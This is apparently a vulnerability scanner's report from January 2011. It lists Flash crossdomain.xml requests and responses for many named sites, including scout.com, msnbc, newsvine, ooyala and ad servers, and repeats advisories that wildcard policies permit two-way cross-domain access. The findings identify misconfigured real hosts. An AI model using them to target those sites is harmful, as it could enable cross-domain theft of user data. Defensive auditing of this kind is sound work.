Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: colstc.redacted
Response
HTTP/1.0 200 OK Cache-Control: max-age=31536000 Content-Type: text/xml Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT Accept-Ranges: bytes ETag: "06e6dae977dc81:0", Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Server: co1mppstca04 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 30 Jan 2011 01:42:42 GMT Content-Length: 224 Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: colstj.redacted
Response
HTTP/1.0 200 OK Cache-Control: max-age=31536000 Content-Type: text/xml Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT Accept-Ranges: bytes ETag: "06e6dae977dc81:0", Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Server: co1mppstca03 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 30 Jan 2011 01:42:45 GMT Content-Length: 224 Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ec.redcated
Response
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 207 Allow: GET Age: 183121 Date: Sun, 30 Jan 2011 02:08:12 GMT Expires: Thu, 03 Feb 2011 23:16:11 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: i4.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: jcfootball.scout.com
Response
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: http://jcfootball.scout.com/crossdomain.xml Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:9f5" Server: Microsoft-IIS/6.0 Server: Static1 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:09:07 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: mlb.scout.com
Response
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: http://mlb.scout.com/crossdomain.xml Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:9f5" Server: Microsoft-IIS/6.0 Server: Static1 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:09:37 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: p.ace.advertising.com
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:17:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Expires: Sun, 30 Jan 2011 02:17:39 GMT Content-Type: text/xml Content-Length: 81
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: preps.scout.com
Response
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: http://preps.scout.com/crossdomain.xml Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:ef7" Server: Microsoft-IIS/6.0 Server: Market X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:17:49 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: profootball.scout.com
Response
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: http://profootball.scout.com/crossdomain.xml Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:9f5" Server: Microsoft-IIS/6.0 Server: Static1 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:17:58 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: r1.ace.advertising.com
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:18:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Expires: Sun, 30 Jan 2011 02:18:12 GMT Content-Type: text/xml Content-Length: 81
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s0.2mdn.net
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sat, 29 Jan 2011 15:17:01 GMT Expires: Thu, 27 Jan 2011 15:16:53 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 39693 Cache-Control: public, max-age=86400
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: sas.ooyala.com Proxy-Connection: keep-alive Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 12:49:00 GMT Status: 200 OK Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 344 Expires: Sun, 30 Jan 2011 13:49:00 GMT Cache-Control: public, must-revalidate, max-age=3600
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: secure.scout.com
Response
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: https://secure.scout.com/crossdomain.xml Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:ab5" Server: Microsoft-IIS/6.0 Server: Secure1 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 01:34:39 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: stj.redacted
Response
HTTP/1.0 200 OK Cache-Control: max-age=31536000 Content-Type: text/xml Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT Accept-Ranges: bytes ETag: "06e6dae977dc81:0", Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Server: co1mppstca02 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 30 Jan 2011 01:34:37 GMT Content-Length: 224 Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: whitepg-images.adbureau.net
Response
HTTP/1.0 200 OK Server: Apache/2.0.52 (Red Hat) Last-Modified: Fri, 23 May 2008 20:34:17 GMT ETag: "30dd55-60-44debc0f86440" Accept-Ranges: bytes Content-Length: 96 Content-Type: text/xml Cache-Control: max-age=86158 Expires: Mon, 31 Jan 2011 01:47:57 GMT Date: Sun, 30 Jan 2011 01:51:59 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: wrapper.g.redacted
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 29 Sep 2009 20:50:08 GMT Accept-Ranges: bytes ETag: "81a1fd6d4641ca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 01:52:07 GMT Connection: close Content-Length: 346
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.morningstar.com
Response
HTTP/1.0 200 OK Cache-Control: private Pragma: no-cache Content-Length: 208 Content-Type: text/xml Last-Modified: Thu, 23 Apr 2009 16:15:25 GMT Accept-Ranges: bytes ETag: "e88bdab52ec4c91:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 01:54:04 GMT Connection: close Set-Cookie: fp=015129635244320254; expires=Sun May 21 02:00:00 2025; domain=.morningstar.com; path=/
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.scout.com
Response
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: http://www.scout.com/crossdomain.xml Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:9f5" Server: Microsoft-IIS/6.0 Server: Static1 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 01:25:47 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.terra.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:03:33 GMT Server: Apache Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296353013.175600; path=/; expires=Fri, 01-Jan-2016 00:02:31 GMT; domain=.terra.com Last-Modified: Fri, 11 Jan 2008 15:27:05 GMT ETag: "17bb6-91-44373f5718440" Accept-Ranges: bytes Content-Length: 145 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.webmd.com
Response
HTTP/1.1 200 OK Content-Length: 207 Content-Type: text/xml Content-Location: http://www.webmd.com/crossdomain.xml Last-Modified: Tue, 19 Aug 2008 19:19:28 GMT Accept-Ranges: bytes ETag: "060a57f302c91:7ec" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:04:07 GMT Connection: keep-alive
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain- ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.wsod.com
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:39:18 GMT Content-Type: text/xml Connection: close Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT ETag: "61f4da-20a-47fbe8ebb5c80" Accept-Ranges: bytes Content-Length: 522 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: admedia.wsod.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:05:22 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n35 ( iad-agg-n36), rf-ht iad-agg-n36 ( origin>CONN) Cache-Control: max-age=259200 Expires: Wed, 02 Feb 2011 02:05:22 GMT Age: 0 Content-Length: 821 Content-Type: text/xml Last-Modified: Tue, 16 Feb 2010 21:41:47 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: alex-johnson.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:04:23 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT ETag: "d5c01d-191-492fdc6f26c40" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=968 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: athima-chansanchai.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:04:33 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT ETag: "d5c01d-191-492fdc6f26c40" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=973 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: bodyodd.msnbc.redacted
Response
HTTP/1.0 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT ETag: "20b4005-191-492fdc7203300" Accept-Ranges: bytes Content-Length: 401 Content-Type: text/xml Date: Sun, 30 Jan 2011 02:06:09 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: boyle.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT ETag: "d5c01d-191-492fdc6f26c40" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=989 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: cartoonblog.msnbc.redacted
Response
HTTP/1.0 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT ETag: "20b4005-191-492fdc7203300" Accept-Ranges: bytes Content-Length: 401 Content-Type: text/xml Date: Sun, 30 Jan 2011 02:06:16 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.1 Host: cdn.modules.ooyala.com Proxy-Connection: keep-alive Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: dateline.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT Accept-Ranges: bytes ETag: "80c394d6f2bdcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:08:03 GMT Connection: close Content-Length: 3744
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: hardball.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT Accept-Ranges: bytes ETag: "80c394d6f2bdcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:08:22 GMT Connection: close Content-Length: 3744
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: helenaspopkin.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:07:18 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT ETag: "d5c01d-191-492fdc6f26c40" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=994 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.1 Host: info.ooyala.com Proxy-Connection: keep-alive Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 15:39:14 GMT Server: Apache Last-Modified: Fri, 16 Jul 2010 14:51:39 GMT Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Cache-Control: max-age=3600, public Connection: close Content-Type: text/x-cross-domain-policy Content-Length: 330
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all" />
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: ingame.msnbc.redacted
Response
HTTP/1.0 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT ETag: "20b4005-191-492fdc7203300" Accept-Ranges: bytes Content-Length: 401 Content-Type: text/xml Date: Sun, 30 Jan 2011 02:08:29 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: ingame.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:07:25 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT ETag: "d5c01d-191-492fdc6f26c40" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=952 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: jp.video.redacted
Response
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Length: 530 Content-Type: text/xml Last-Modified: Mon, 26 Oct 2009 08:02:40 GMT Accept-Ranges: bytes ETag: "01042b01256ca1:1892" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:09:08 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.1 Host: l.player.ooyala.com Proxy-Connection: keep-alive Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx/0.7.61 Date: Sun, 30 Jan 2011 12:49:02 GMT Content-Type: text/x-cross-domain-policy Connection: close Cache-Control: max-age=3600, private Content-Length: 330
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all" />
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: latino.aol.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
